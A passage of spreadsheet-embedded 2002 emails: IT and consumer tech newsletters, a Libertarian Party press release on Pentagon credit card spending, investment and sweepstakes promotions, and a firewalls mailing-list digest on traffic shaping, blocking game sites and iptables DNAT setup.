Oltsik, don't fret, it's available for you to view at your leisure. 
And, while you're at it, take a look at all our previously aired
Webcasts, as well our upcoming live events.  We're sure you'll find
topics that interest you. View of archive on best practices for availability and performance
management with Jon Oltsik:
http://searchnetworking.techtarget.com/webcastsTranscriptSecurity/1,289693,sid7_gci832106,00.html View our upcoming events and Webcast archive list here:
http://searchnetworking.techtarget.com/onlineEvents/0,289675,sid7,00.html=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
NETWORKS OF THE FUTURE | SearchNetworking Featured TopicLast week we attended Burton Group's Catalyst Conference and heard
all about the hottest trends in networking: VPNs, VoIP, wireless,
identity management, and Web services. Read more about the issues
surrounding each topic.Click here for the current Featured Topic:
http://searchnetworking.techtarget.com/featuredTopic/0,290042,sid7_gci839778,00.html=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
EXPERT ADVICE: TED STUDWELL | Voice over IP ExpertDear Ted,
Where can we get information about Inmarsat services? &gt;&gt; Click for Ted Studwell's response:
http://searchnetworking.techtarget.com/ateQuestionNResponse/0,289625,sid7_cid478713_tax292243,00.html&gt;&gt; Click here for other Q&amp;As with Ted that you might find useful:
http://searchnetworking.techtarget.com/ateAnswers/0,289620,sid7_tax292243,00.html&gt;&gt; Click here to pose your VoIP question to Ted Studwell:
http://searchnetworking.techtarget.com/ateQuestion/0,289624,sid7_cid466224_tax292243,00.html=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
FEATURED BOOK | SearchNetworking BookstoreTitle: Microsoft encyclopedia of networking
Author: Mitch Tulloch, and Ingrid TullochDescription: This second edition of the award-winning Microsoft
encyclopedia of networking has been fully updated with thousands of
entries detailing the latest technologies, standards, products, and
services. You get clear, concise explanations, including hundreds of
new articles and diagrams that deftly take you from concept to
real-world application. You also get the entire encyclopedia on
CD-ROM, for definitive answers wherever you need them.&gt;&gt; Click here for ordering information:
http://www.digitalguru.com/DigitalGuru/product_detail.asp?catalog_name=Books&amp;category_name=&amp;product_id=0735613788&amp;partner_id=65____________________________________________________________________ 
:::::::::::::::::::  SEARCHNETWORKING CONTACTS   :::::::::::::::::::  SUSAN FOGARTY, Site Editor (sfogarty@techtarget.com) 
   &gt;&gt; Send us your suggestions for tips and articles. 
____________________________________________________________________  KARA GATTINE, Assistant Site Editor (kgattine@techtarget.com)
   &gt;&gt; Send your white papers, tips and best Web link recommendations.
____________________________________________________________________  BETH QUIMBY, News Editor (bquimby@techtarget.com) 
   &gt;&gt; Send in your product announcements and poll ideas. 
____________________________________________________________________  GABRIELLE DERUSSY (gderussy@techtarget.com) 
   &gt;&gt; Sponsor this or any other TechTarget newsletter. 
____________________________________________________________________ 
::::::::::::::::::::  ABOUT THIS NEWSLETTER   ::::::::::::::::::::: 
Created by TechTarget (http://www.techtarget.com) 
 TechTarget - The Most Targeted IT Media 
 Copyright 2002, All Rights Reserved.  
Unsubscribe from 'Voice Over IP Tips'
 - Simply Reply to this Email with REMOVE within the Body or Subject
&gt;  or
 - Go to: http://searchNetworking.techtarget.com/register
 - Log in to edit your profile.
 - Click on the link to Edit email subscriptions.
 - Uncheck the box next to the newsletter you wish 
   to unsubscribe from.
 - When finished, click "Save Changes to My Profile."</t>
  </si>
  <si>
    <t xml:space="preserve">-----BEGIN PGP SIGNED MESSAGE-----===============================
NEWS FROM THE LIBERTARIAN PARTY
2600 Virginia Avenue, NW, Suite 100
Washington DC 20037
World Wide Web: http://www.LP.org
===============================
For release: July 25, 2002
===============================
For additional information:
George Getz, Press Secretary
Phone: (202) 333-0008 Ext. 222
E-Mail: pressreleases@hq.LP.org
===============================Thousands spent on strippers, golf memberships
shows Pentagon spending is out of control, Libertarians sayWASHINGTON, DC -- Quiz question: Which of the following items have been 
charged to the taxpayers recently by military personnel wielding 
government-issued credit cards?(a) $38,000 for lap dancing at strip clubs near military bases.(b) $3,400 for a Sumo wrestling suit and $9,800 for Halloween costumes.(c) $7,373 for closing costs on a home and $16,000 for a corporate golf 
membership.(d) $4,600 for white beach sand and $19,000 worth of decorative "river 
rock" at a military base in the Arabian desert.(e) all of the above."Incredibly, the answer is 'all of the above,' said Steve Dasbach, 
Libertarian Party executive director. "Thanks to the federal 
government's policy of doling out credit cards with no questions asked, 
the military has launched a raid on your wallet."The shocking revelations are contained in a General Accounting Office 
audit released last week that uncovered $101 million in "seemingly 
unneeded expenditures" made by the Air Force and Army in 2000 and 
2001. The purchases were made possible by the federal government's lax 
credit card policy: At least 1.4 million Defense Department employees 
carry credit cards, and last year they used them to splurge on $6.1 
billion in goods and services, the audit found.In one case, a group of 200 soldiers used their military IDs and 
government-issued travel cards to get cash at adult-entertainment bars, 
then spent the money there. The clubs charged a 10 percent fee to 
supply the soldiers with cash -- then billed the full amount to their 
travel cards as a restaurant charge, the GAO found."Are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imagine."Other spending uncovered by the audit included $45,000 for luxury 
cruises, $1,800 for executive pillows, and $24,000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surprisingly, Dasbach said, the audit found "little evidence of 
documented disciplinary action" against those who misused the cards, 
so taxpayers may end up paying the tab.
"It's time to impose a little military discipline on these deadbeat 
Defense Department workers, and force them to personally reimburse 
taxpayers for every penny of improper spending," he said.
"Then cut the Pentagon's massive $379 billion budget to help guard 
against such wasteful spending in the future. Perhaps that's one way to 
force the Pentagon to spend its resources defending the country, 
instead of offending the taxpayer."
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2iQCVAwUBPUA6FdCSe1KnQG7RAQGAKwP/Zpfw0Uq3BPLnXXmnlWQ2aFFb1FSaj+nJ
QOMt9q4TBhiYJhIdgdd+uGxoubiPfvyIweSR1PjOdoFe8dYf2h/V4gNS9hSmkSgC
76RZVuitNf2DbEsaY8TtcUDLDC51m/jgxiGcgPkcyJ+0Wn11RRbktkVEefSNTaBz
M8ibVFiDPyI=
=9fYc
-----END PGP SIGNATURE----------------------------------------------------------------------------
The Libertarian Party                                http://www.lp.org/
2600 Virginia Ave. NW, Suite 100                    voice: 202-333-0008
Washington DC 20037                                   fax: 202-333-0072
-----------------------------------------------------------------------
For subscription changes, please use the WWW form at: 
http://www.lp.org/action/email.html
</t>
  </si>
  <si>
    <t xml:space="preserve">LIFETIMETV.COM SWEEPSTAKES REMINDERThursday, July 25, 2002***********************************************************
NEW SEASON OF A LIFETIME SWEEPSTAKESEnter our New Season of a Lifetime Sweepstakes for a chance to kick up your heels with the stars! On July 28, you can tune in to Lifetime's Sunday night lineup, which includes our new original series, "For the People," and all-new episodes of "Strong Medicine" and "The Division." Best of all, enter the New Season of a Lifetime Sweepstakes and you could win a trip to the set of "Strong Medicine" and a $10,000 summer shopping spree! Enter daily for more chances to win.Go to http://www.lifetimetv.com/sweeps/newseason/lt_entry.html.***********************************************************
We don't want you to miss this fantastic sweepstakes! If you have any problems accessing the link, just copy and paste it into your browser's address box.
***********************************************************
SUBSCRIPTION INFO FOR THE LIFETIMETV.COM SWEEPSTAKES REMINDERPlease do not reply to this e-mail; it's automatically generated and this mailbox is not read by anyone, therefore you will not get a response. If you wish to be removed from the Sweepstakes Reminder mailing list, please send an e-mail to unsubscribe-sweeps@email.lifetimetv.com.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
</t>
  </si>
  <si>
    <t>You are receiving this email because you signed up to 
receive one of our free reports. If you would prefer 
not to receive messages of this type, please 
unsubscribe by following the instructions at the 
bottom of this message.
Dear Investor,Thank you again for requesting our free special 
report, "The One Stock that Keeps Wall Street 
BUZZING."We began The Motley Fool in 1993 with the idea that 
investors like you deserved better. Better than Wall Street's all-too-often biased 
research...  Better than analysts who speak in "secret 
codes" allowing them to hedge or spin any 
recommendation...  and better than what passes for "full 
financial disclosure" in big business today.Given a level playing field, we believe that regular 
folks -- like us, and you -- can do quite well in the 
stock market. Why put trust in conflicted information 
from others when you could count on your own 
abilities, and potentially blow the pros away? More than two million people visit our Fool.com web 
site each month.  We spend a great deal of time at 
Fool.com instructing people HOW to invest, but not so 
much about WHERE to invest. And that's why we created the Motley Fool Stock 
Advisor.You are cordially invited to join us as a Charter 
Subscriber to Motley Fool Stock Advisor as we focus on 
the great companies of the U.S. stock market. In the same, honest, no-holds-barred style that has 
made Fool.com so popular with investors, we'll bring 
you our best stock recommendations and other financial 
insights to help you achieve your financial dreams.As a Charter Subscriber, you'll get the Motley Fool 
Stock Advisor newsletter delivered to your home each 
month -- a personal communication from us, David &amp; Tom 
Gardner.  We'll tell you exactly why we believe a 
stock is poised for significant growth -- and give you 
all the facts to back that analysis up.  You'll get 
the good, the bad and the ugly on every recommendation 
we make -- so you can make each investing decision 
with great confidence.Of course, there's more to our Motley Fool Stock 
Advisor than our monthly newsletter.You'll also receive our monthly, between-issue, e-mail 
Fool Flash to help you take full advantage of breaking 
opportunities.  And you can log on anytime at the 
Motley Fool Stock Advisor subscriber-only Web site, 
featuring current &amp; back newsletter issues...full 
updates on our selected stocks...Q &amp; A...and more.Best of all, you can try our Motley Fool Stock Advisor 
entirely RISK-FREE.The Motley Fool community has always been based upon 
trust and value -- principles we intend to continue 
here. So we want to give you plenty of time to decide 
if our Motley Fool Stock Advisor is a valuable 
investing tool for you.You can try our Motley Fool Stock Advisor for six full 
months 100% RISK-FREE. If we don't prove its worth to 
you, it doesn't cost you a dime.And you have our word on that.So join us now. It's going to be fun. It's going to be 
exciting. And it's going to be an enriching experience 
you won't want to miss.To join us, RISK-FREE, as a Charter Subscriber to 
David &amp; Tom Gardner's Motley Fool Stock Advisor, 
simply click here now: 
http://www.ppi-orders.com/index.htm?promo_code=1UE728Foolishly yours,David &amp; Tom Gardner
The Motley FoolP.S. Click here 
http://www.ppi-orders.com/index.htm?promo_code=1UE728
to check out the FREE bonuses you get when you 
subscribe.  Special Reports; videos; online seminars -
- all yours to enjoy and keep, even if you cancel your 
trial subscription to our Motley Fool Stock Advisor.Remember, you have six full months to evaluate our new 
service.  Don't like what you see, don't make the 
profits you expect...then it doesn't cost you a dime.  
So this invitation is truly RISK-FREE.  Click here now 
http://www.ppi-orders.com/index.htm?promo_code=1UE728
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
HOW TO UNSUBSCRIBEWe hope this email message is of value to you. If 
however, you do not wish to receive any of our future 
messages, please unsubscribe by going to the following 
web address:http://www.investorplace.com/newunsubscribe.php?q=66527235-1 **Note if you unsubscribe by replying to this message 
please use Unsubscribe or Remove in the subject line. 
Thu Jul 25 15:39:46 2002</t>
  </si>
  <si>
    <t xml:space="preserve">firewalls Digest	Thu, 25 Jul 2002	Volume: 01  Issue: 033In This Issue:
		Re: QOS
		FW: disable some sites
		DNAT with iptables question
		RE: DNAT with iptables question----------------------------------------------------------------------From: "George J. Jahchan" 
Subject: Re: QOS
Date: Thu, 25 Jul 2002 12:11:40 +0300
&gt; So, I'm forced to conclude that the PacketShaper either sucks in a major
&gt; way, or that your explanation/the explanation that you have been given of
&gt; it is wrong. (Sorry.)You are wrong on both counts. Explanation is valid for symmetrical TCP, for
others see explanations below.&gt; Yes, all packets in an established TCP connection have the ACK flag set.
&gt; So all packets except SYNs are candidates for delay when traffic limits
&gt; are exceeded? Whoops.You should change that to: ... are always candidates for predictive or
preventive delay.ACKs are delayed (per flow) in such a way that WAN-bound traffic reaching
the edge router's Ethernet interface does not exceed WAN link speed (NO
ROUTER QUEUES!). It does not wait for the link to be at or near saturation
to act -- that is why, unlike queueing, it is predictive and not reactive.It slows down the rate of transmission of sending hosts (on a per-flow
basis) to accommodate WAN link speed limit and current network utilization,
rather than fill up queues at LAN speeds and empty them at WAN speeds,
eventually dropping the excess once the queue(s) fill up, informing hosts to
slow down their rate of transmission once queues are beyond a fixed
threshold (90%?).Rate control works equally well for outbound and inbound traffic. Ever heard
of an effective queueing technology for inbound traffic? Queueing packets
after they have crossed a congested link does not make much sense, does it?Re: IPsec/GRE or other encapsulated trafficIt obviously cannot dissect IPsec/GRE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ends.UDP and asymmetrical TCP (where the PS and router only see the outgoing
packet, return traffic coming back through a satellite downlink to a station
on the LAN) are handled differently.For asymmetrical TCP, it will time the release of packets to the receiving
device, thereby indirectly timing the release of acknowledgements by the
receiving host. This informs the sender's TCP/IP stack that it should slow
the release of packets because limited bandwidth is available.For UDP, it utilizes flow-based derivative random drop. It selectively drops
only one packet at a time from flows that are predicted to cause congestion,
which prevents heavy retransmissions and application timeouts.ICMP packets exceeding policy limits are dropped.&gt;_Maybe_ you can do a special case for TCP and try to offload some of the
queueing on
&gt; the endpoints, but I really don't see the real gain in that.The real gain is manageability and control. A LAN host only knows about the
state of its own connections and is oblivious to WAN conditions until its
TCP/IP stack learns (when router queues are nearly full) that the WAN is
congested. A PS will predict and inform the LAN hosts' TCP/IP stacks of the
"speed limit to obey" for every connection (based on policies and network
conditions), avoiding congestion. Control for asymmetrical TCP and UDP may
not be as "tight" as for symmetrical TCP, but it does work.Queueing is akin to deploying cops only when traffic jams occur, vs. rate
control where cops are permanently deployed throughout town, communicating
with each other and with a central control point, predicting upcoming
congestion and regulating traffic, ensuring a smooth flow of traffic. If
there is potential for congestion, it will take a driver a hell of lot
longer to cross town with first approach than it will with the second. Do
you agree?----- Original Message -----
From: "Mikael Olsson" 
To: "George J. Jahchan" 
Cc: "Firewalls List" 
Sent: Wednesday, July 24, 2002 4:50 pm
Subject: Re: QOS
"George J. Jahchan" wrote:
&gt;
&gt; The whole purpose of the device is to pro-actively prevent WAN
congestion --
&gt; it sits between client and server (client inside/server outside or client
&gt; outside/server inside -- it does not make any difference) and pro-actively
&gt; adjusts the TCP window size (by delaying the acknowledgement) to get the
&gt; sending host to honor the speed limit for that individual connection
&gt; (calculated in real-time based on user-defined policies and current
network
&gt; conditions).Umm, don't get me wrong here, but I think you've been fed a less-than-
accurate sales pitch.Let's ponder this for a minute.The device works by delaying ACKs... that is: packets with the ACK
flag set, right?...[letting this sink in for a while]...Yes, all packets in an established TCP connection have the ACK flag set.
So all packets except SYNs are candidates for delay when traffic limits
are exceeded? Whoops.
Okay, let's assume for a second that the packets aren't actually delayed,
but that the ACK sequence numbers or TCP window size fields are re-written
(dicey). All you've accomplished is move the queueing (delaying) from
the traffic shaper to the endpoints. You still get L7-to-L7 delays. Big
deal if it happens on the wire or in the stack. Also, convincing endpoints
to do delays probably results in less-than-perfect shaping since stack
retransmit timings suddenly affect the actual bandwidth available rather
than having the shaper itself do it; the shaper knows exactly when there
is bandwidth available.But this doesn't even begin to touch on other protocols like UDP or
ICMP. Or, for that matter, IPsec/GRE/whatever tunneled traffic.
Neither of them have sequence numbers or window sizes that you can
manipulate.
So, I'm forced to conclude that the PacketShaper either sucks in a major
way, or that your explanation/the explanation that you have been given of
it is wrong. (Sorry.)What I think happens is that the delay is &lt;=2msec as long as traffic
limits aren't exceeded. This is reasonable. BUT when traffic exceeds
the limits, things will begin to be queued. Now, with a well-behaved
TCP stack, this _will_ mean that it will fall back to lower transmission
rates; this is how TCP was designed, so that part isn't all wrong.And, again, this kind of shaping isn't rocket science. That is not to
say that there are shapers out there that are just being plain dumb
(always queueing and the selecting what gets transmitted out of the
queue), but, well, I just can't see that you can get any smarter
than queueing when limits are actually exceeded.  _Maybe_ you can do
a special case for TCP and try to offload some of the queueing on the
endpoints, but I really don't see the real gain in that.
Respectfully,
/Mikael Olsson--
Mikael Olsson, Clavister AB
Storgatan 12, Box 393, SE-891 28 ï¿½RNSKï¿½LDSVIK, Sweden
Phone: +46 (0)660 29 92 00   Mobile: +46 (0)70 26 222 05
Fax: +46 (0)660 122 50       WWW: http://www.clavister.com"It's July. I'm on vacation. Can't you tell? :)"
--
Firewalls mailing list - [ firewalls@isc.org ]
To unsubscribe: http://www.isc.org/services/public/lists/firewalls.html------------------------------From: "Hiemstra, Brenno" 
Subject: FW: disable some sites
Date: Thu, 25 Jul 2002 13:44:18 +0200
The list addy changed ofcourse   :o)&gt; -----Original Message-----
&gt; From:	Hiemstra, Brenno 
&gt; Sent:	donderdag 25 juli 2002 12:27
&gt; To:	'Michael Zhao'; Hiemstra, Brenno
&gt; Cc:	firewalls@lists.gnac.net
&gt; Subject:	RE: disable some sites
&gt; 
&gt; Michael,
&gt; 
&gt; If I was in your shoes I would first investigate if there
&gt; is a security policy in your organisation. If you dont know
&gt; what I mean by a security policy I would advice you to 
&gt; start reading about it. A search on google would be of a
&gt; big help for you.
&gt; 
&gt; If there is a security policy I would read it and investigate
&gt; what is tells about how employees are able to use their
&gt; workstations for performing their function. In a security 
&gt; policy there should be things what employees are allowed
&gt; to do on the network / internet and what not.
&gt; 
&gt; If there isnt a security policy I would advice you to implement
&gt; one in your company. Because without one you cant punish
&gt; employees by violating the policy and if there is a court case
&gt; you dont have any rock solid thing to smack around with.
&gt; 
&gt; Without a policy you are just implementing solutions to prevent
&gt; employees in doing things that, im my opinion, they arent allowed
&gt; to do on their workstations anyway. I dont like the idea that 
&gt; employees play games, use kazaa, ICQ, MSN, etc etc in stead
&gt; of working what we pay them to do. This is why a security policy
&gt; is important because then you can say to employees that they
&gt; violated it and that there are consequences for that (deny internet
&gt; access, etc etc).
&gt; 
&gt; Owkee...    now that this is out of the way time to proceed about
&gt; the proxy thingie.
&gt; 
&gt; A proxy dont have to be the default gateway of your network to
&gt; use it. It is a function in Internet Explorer or whatever browser you
&gt; use in your network.
&gt; 
&gt; If you ask me Checkpoint Firewalls are just good in using for what
&gt; their real purpose is and that is firewalling a network. I dont like the
&gt; idea that my firewall is also CVS http thingie because I dont think
&gt; a firewall is its purpose to do that. Proxies are a much better solutions
&gt; for that and they are also developed for that purpose.
&gt; 
&gt; Depending on your network setup and the OS and Proxy brand of your
&gt; current proxy you have several solutions which was already provided 
&gt; by people on this list. My favorite proxy is Squid and there are probably
&gt; a lot of http blacklist programs that work with Squid to block websites
&gt; and stuff.
&gt; 
&gt; I still think you should first deny direct internet traffic from
&gt; workstations.
&gt; and only allow traffic to the internet from servers that are allowed to do
&gt; so. You should think about proxies, email servers, etc etc. This should
&gt; also prevent people from playing games, especially those Quake kinda
&gt; games because those use ports that arent necessary for normal 
&gt; webbrowsing. Games running over port 80 and not http related are blocked
&gt; by the proxy if that proxy is a true Layer 7 application layer proxy.
&gt; These
&gt; kinda proxies can view in the TCP/IP packet and see if this is legitimate 
&gt; http traffic or that someone tries to tunnel something over port 80.
&gt; 
&gt; Anyway...    again food for some thoughts,
&gt; 
&gt; Regards,
&gt; 
&gt; 
&gt; 
&gt; Brenno
&gt; 
&gt; 
&gt; -----Original Message-----
&gt; From:	Michael Zhao [SMTP:mzhao@everlastingsystems.com]
&gt; Sent:	woensdag 24 juli 2002 2:38
&gt; To:	Hiemstra, Brenno
&gt; Cc:	firewalls@lists.gnac.net
&gt; Subject:	Re: disable some sites
&gt; 
&gt; Thanks your reply.
&gt; 
&gt; I built up my network three years ago . I have proxy which we only use 
&gt; cache to accelerate our internet accessing , it is not a gateway . It is 
&gt; too difficult to change the topology , many thing need to be changed.
&gt; 
&gt; Did you have another idea to help me? Someone suggest me to buy the 
&gt; websence , but I dont have the budget right now.
&gt; 
&gt; Thanks a lot
&gt; 
&gt; Michael
&gt; 
&gt; Hiemstra, Brenno wrote:
&gt; 
&gt; &gt;Michael,
&gt; &gt;
&gt; &gt;The first thing is to build a security policy that
&gt; &gt;states what people are allowed to do and what
&gt; &gt;not. Everyone needs to accept this policy and 
&gt; &gt;if they violate it you can apply rules that you state
&gt; &gt;in your security policy.
&gt; &gt;
&gt; &gt;If I had the option for your network setup I would
&gt; &gt;install a proxy server and demand every client
&gt; &gt;to connect to the proxy if they want to use the 
&gt; &gt;internet.
&gt; &gt;
&gt; &gt;The proxy will only allow http, ftp, and other "approved"
&gt; &gt;services to connect to the internet. And you can let
&gt; &gt;them check to some database which websites are
&gt; &gt;allowed and deny access to sites that aren't allowed
&gt; &gt;
&gt; &gt;Your company firewall will only allow the proxy to connect
&gt; &gt;to the internet. Clients are denied.
&gt; &gt;
&gt; &gt;This way the clients cant connect directly to the internet
&gt; &gt;game servers and on the proxy you can deny clients
&gt; &gt;to connect to the game servers.
&gt; &gt;
&gt; &gt;I hope this is an option for you.
&gt; &gt;
&gt; &gt;Regards,
&gt; &gt;
&gt; &gt;
&gt; &gt;Brenno
&gt; &gt;
&gt; &gt;&gt;-----Original Message-----
&gt; &gt;&gt;From:	Michael Zhao [SMTP:mzhao@everlastingsystems.com]
&gt; &gt;&gt;Sent:	dinsdag 23 juli 2002 14:10
&gt; &gt;&gt;To:	firewalls@lists.gnac.net
&gt; &gt;&gt;Subject:	disable some sites
&gt; &gt;&gt;
&gt; &gt;&gt;Hi , all
&gt; &gt;&gt;
&gt; &gt;&gt;I choose checkpoint fw-1 as my firewall . I found many company users 
&gt; &gt;&gt;play internet games like CS, ourgame . I find users download their 
&gt; &gt;&gt;clients software and install  on their local workstation , after run it 
&gt; &gt;&gt;, the programe can connect to game server automatically .
&gt; &gt;&gt;
&gt; &gt;&gt;Usally , there are many sites of every internet game server. I.E. I want
&gt; 
&gt; &gt;&gt;disable accessing the game servers like xxx.ourgame.com from my internal
&gt; 
&gt; &gt;&gt;net , how can I do that except find all of their IP address , because it
&gt; 
&gt; &gt;&gt;is so complecat to do . Who can tell me .
&gt; &gt;&gt;
&gt; &gt;&gt;Regards,
&gt; &gt;&gt;Michael
&gt; &gt;&gt;
&gt; &gt;&gt;-- 
&gt; &gt;&gt;Firewalls mailing list - [ firewalls@isc.org ]
&gt; &gt;&gt;To unsubscribe: http://www.isc.org/services/public/lists/firewalls.html
&gt; &gt;&gt;
&gt; ------------------------------Date: Thu, 25 Jul 2002 15:08:21 -0600
From: Jerry Lynde 
Subject: DNAT with iptables question
Howdy folks,I've been scouring the online docs for solid info on how to accomplish DNAT 
with iptables.Essentially, I have converted the ipmasqadm lines of the form...ipmasqadm portfw -a -P tcp -L $WEB_OUT  http    -R $WEB_IN      httpto iptables lines of the form...$IPTABLES -A PREROUTING -t nat -p tcp -d $WEB_OUT --dport 80 -j DNAT --to 
$WEB_IN:80with the accompanying lines...
$IPTABLES -A FORWARD -i $INTIF -o $EXTIF -m state --state 
ESTABLISHED,RELATED -j ACCEPT
$IPTABLES -A FORWARD -i $EXTIF -o $INTIF -m state --state 
ESTABLISHED,RELATED -j ACCEPT
$IPTABLES -A FORWARD -i $EXTIF -o $INTIF -p tcp -j ACCEPTThe last two lines seem functionally sorta redundant, but I threw em in in 
an effort to make this work.
So far, I am unable to show that it's working correctly... I even tried 
logging all packets...$IPTABLES -A FORWARD -i $INTIF -p tcp -j LOG --log-level info
$IPTABLES -A FORWARD -i $EXTIF -p tcp -j LOG --log-level infoBut nothing show up in /var/log/messages or anywhere else for that matter. 
This is on a Redhat 7.3 box.
Any help, clues, flames, RT(his particular)FM, etc are appreciated.I read the list, so please don't reply directly in addition to the list 
resposne.
Thanks,Jer 
------------------------------From: "Reckhard, Tobias" 
Subject: RE: DNAT with iptables question
Date: Fri, 26 Jul 2002 08:32:37 +0200
&gt; $IPTABLES -A PREROUTING -t nat -p tcp -d $WEB_OUT --dport 80 
&gt; -j DNAT --to 
&gt; $WEB_IN:80
&gt; 
&gt; with the accompanying lines...
&gt; 
&gt; 
&gt; $IPTABLES -A FORWARD -i $INTIF -o $EXTIF -m state --state 
&gt; ESTABLISHED,RELATED -j ACCEPT
&gt; $IPTABLES -A FORWARD -i $EXTIF -o $INTIF -m state --state 
&gt; ESTABLISHED,RELATED -j ACCEPT
&gt; $IPTABLES -A FORWARD -i $EXTIF -o $INTIF -p tcp -j ACCEPT
&gt; 
&gt; The last two lines seem functionally sorta redundant, but I 
&gt; threw em in in 
&gt; an effort to make this work.You're missing the NEW state. The initial SYN packet will not match with
either of the first two rules. It should match the third if it's inbound,
though.&gt; So far, I am unable to show that it's working correctly... I 
&gt; even tried 
&gt; logging all packets...
&gt; 
&gt; $IPTABLES -A FORWARD -i $INTIF -p tcp -j LOG --log-level info
&gt; $IPTABLES -A FORWARD -i $EXTIF -p tcp -j LOG --log-level info
&gt; 
&gt; But nothing show up in /var/log/messages or anywhere else for 
&gt; that matter. You need to insert those logging rules above any ACCEPT, REJECT or DENY
rules for them to be of any use. Are you sure the packets are hitting the
box at all? Try moving the log rules to the top of the FORWARD chain,
introduce logging rules to the PREROUTING, POSTROUTING, INPUT and OUTPUT
chains, and/or use tcpdump as well to see where the packets are travelling.Cheers
Tobias------------------------------End of firewalls Digest V1 #33
******************************
</t>
  </si>
  <si>
    <t>CNET AnnouncementÂ Â July 26, 2002
uBid.com
uBid  helps you save more on your technology purchases.  Name your own price auction format lets you buy below wholesale.  Our service and prices have provided value to close to one million customers.  Thousands of new items go up for sale each day, so there's always new merchandise to bid on.
Visit uBid today and put in a bid on that item you've been shopping for.The e-mail address for your subscription isÂ sdfs@fsg.com
UnsubscribeÂ |Â Manage My Subscriptions
Â |Â FAQ
Â |Â AdvertisePrice comparisons | 
Product reviews | 
Tech news |
Downloads | 
All CNET services
.</t>
  </si>
  <si>
    <t xml:space="preserve">
Buyer's Alert | July 23, 2002When ordering, make sure the reseller/manufacturer 
provides the rebate coupon you need.
Expires July 31, 2002
Get a car cassette adapter and power adapter FREE with Rio Volt SP250Expires August 31, 2002
$20 off SideWinder Strategic CommanderExpires September 30, 2002
$20 off Rio 600 64MB
$20 off Nike PSA (120)
$20 off RioVolt SP90
Expires March 3, 2003
$10 off Microsoft Natural Keyboard Pro PS2/USB
 Desktop systemsÂ Â 
1.Gateway 700XLPremier merchant:
Gateway $2,999
Â 2.Dell Dimension 4000Premier 
            merchant:Dell $7393.HP Pavilion 9504.Alienware Aurora DDR5.Voodoo F-Class LEMore Top 
            Selling Products...Â 
Dear Reader,
Any technojunkie worth his or her salt salivates at the mere 
thought of having the latest and greatest gizmos. After all, 
it's all about who has bragging rights of owning the hottest 
toys. So whether you're a gadget newbie or a hardened 
technophile, there's sure to be something that you'll love 
in our picks for the best gadgets around. Handspring Treo 90
Lowest price: $268
Creative Labs Nomad Jukebox 3
Lowest price: $345
	Fujifilm FinePix 30i
Lowest price: $245
Toshiba Pocket PC e310 
Lowest price: $328	Check out our complete list of must-have gadgets
Â 
Â Â Samsung SyncMaster 950bThe SyncMaster 950b's low price, good graphics, and above-average
geometry make it an excellent choice for budget-conscious homes
and offices.Read Review | Check Prices Â Â Â Samsung ML-1430The ML-1430 combines fast print speeds with great output quality--and
a price that budget users can afford. Its lack of expandability restricts 
this laser printer to student, home, or small-office use, though.
Read Review | Check Prices
Â 
$50K-a-day Giveaway from Dell Home Systems
Buy any Dell Home System on or before July 31, 2002 and youâ€™ll 
be automatically entered to win $50,000! No purchase necessary 
to win.
Â 
Â 
Please note 
            that prices fluctuate and may have changed since the sending of this 
            newsletter. Lowest prices listed are usually after rebates (but 
            please check with the reseller, sometimes the rebate is included in 
            their price). 
Sony CLIE PEG-T415Price recently dropped 33%			Lowest price: $199
Panasonic Palmcorder PV-DV901Price recently dropped 19%			Lowest price: $699
Apple iPod (10 GB)Price recently dropped 29%			Lowest price: $349 
SPECIAL FEATUREDid you know that ChannelOnline gives you the tools you need to 
quickly search through your customer profiles?ChannelOnline provides you with drop-down menus that allow you 
to search through your customer base with the click of a button. 
Quickly view which customers each sales rep takes care of or 
when a customer was last added to your database, or search on 
a combination of both. Find the customer profile you need to 
create new quotes and keep your business growing. Sign up now to have organized, detailed customer information 
at your fingertips.
 Tell me more about ChannelOnline.Elsewhere on ZDNetAcer brings P4 power to the people - read the review at ZDNet. Download Builder.com's 'Remedial XML' series.Need a memory upgrade? Find out with CNET's Memory Configurator.Tech Update: Put a lid on CRM costs with self-service.  Check out thousands of IT job listings in ZDNet's Career Center.
Sign up for more free newsletters from ZDNetThe e-mail address for your subscription isÂ belliott@fsl.comUnsubscribeÂ | 
        Â Manage 
        My SubscriptionsÂ |Â FAQÂ | 
        Â Advertise
Home |eBusiness | Security | Networking | Applications | Platforms | Hardware | Careers
        Copyright 2002 CNET Networks, Inc. All rights reserved. ZDNet is a registered service mark of CNET Networks, Inc.          </t>
  </si>
  <si>
    <t xml:space="preserve">DivX News (Number 21, 2002-07-26)
=================================
What's Hot in the World of DivX(tm) Video This Week:
DivX Affiliate Program, Nobody in DivX, and New Player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Sell DivX Pro From Your Web Site
  2. Japanese Crime Noir in DivX Video
  3. Mad Phat Crazy Skins  
  Sell DivX Pro From Your Web Site
  -------------------------------  DivX has become the world's most popular video technology and
  garnered millions of loyal fans thanks almost entirely to
  word-of-mouth buzz from users like you. We've always known that
  DivX users are the generous sort--the kind of people who want to
  share great-looking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you're
  approved, you simply add a DivX download link to your Web site
  and, voila, you're in business. Every time someone clicks on your
  link to DivX.com and purchases DivX Pro, you'll earn a percentage
  of the sale.* Read More About the DivX Pro Affiliate Program on DivX.com:
 %------------------ADVERTISEMENT------------------%
  PRE-ORDER THE LORD OF THE RINGS: THE FELLOWSHIP OF THE RING
  Pre-order The Lord of the Rings DVD. Two hours of extra content
  and a ten-minute behind the scenes look at The Two Towers. Click
  to buy!
    %------------------ADVERTISEMENT------------------%
  Japanese Crime Noir in DivX Video
  ---------------------------------  A wide variety of innovative studios and film distributors have
  been using DivX video-on-demand technology to sell downloadable
  DivX titles online since August of last year. One of the many
  interesting films currently available is the Japanese crime
  thriller "Nobody" from DivX partner Vanguard Cinema. Called "a
  triumph" by the New York Times, "Nobody" is an action-packed
  thriller-noir that tells a story of an escalating cycle of
  violence and revenge. In the tradition of international crime
  thrillers like "La Femme Nikita" and "Tokyo Fist," "Nobody" takes
  the viewer through a labyrinth of suspense and carnage without
  release until the very end.* Watch "Nobody" in High-quality DivX Video:
  Mad Phat Crazy DivX Player Skins
  ---------------------------------  The week's dopest DivX Player Skins:
* DivX 4 Real: Puts an interesting DivX spin on a familiar player
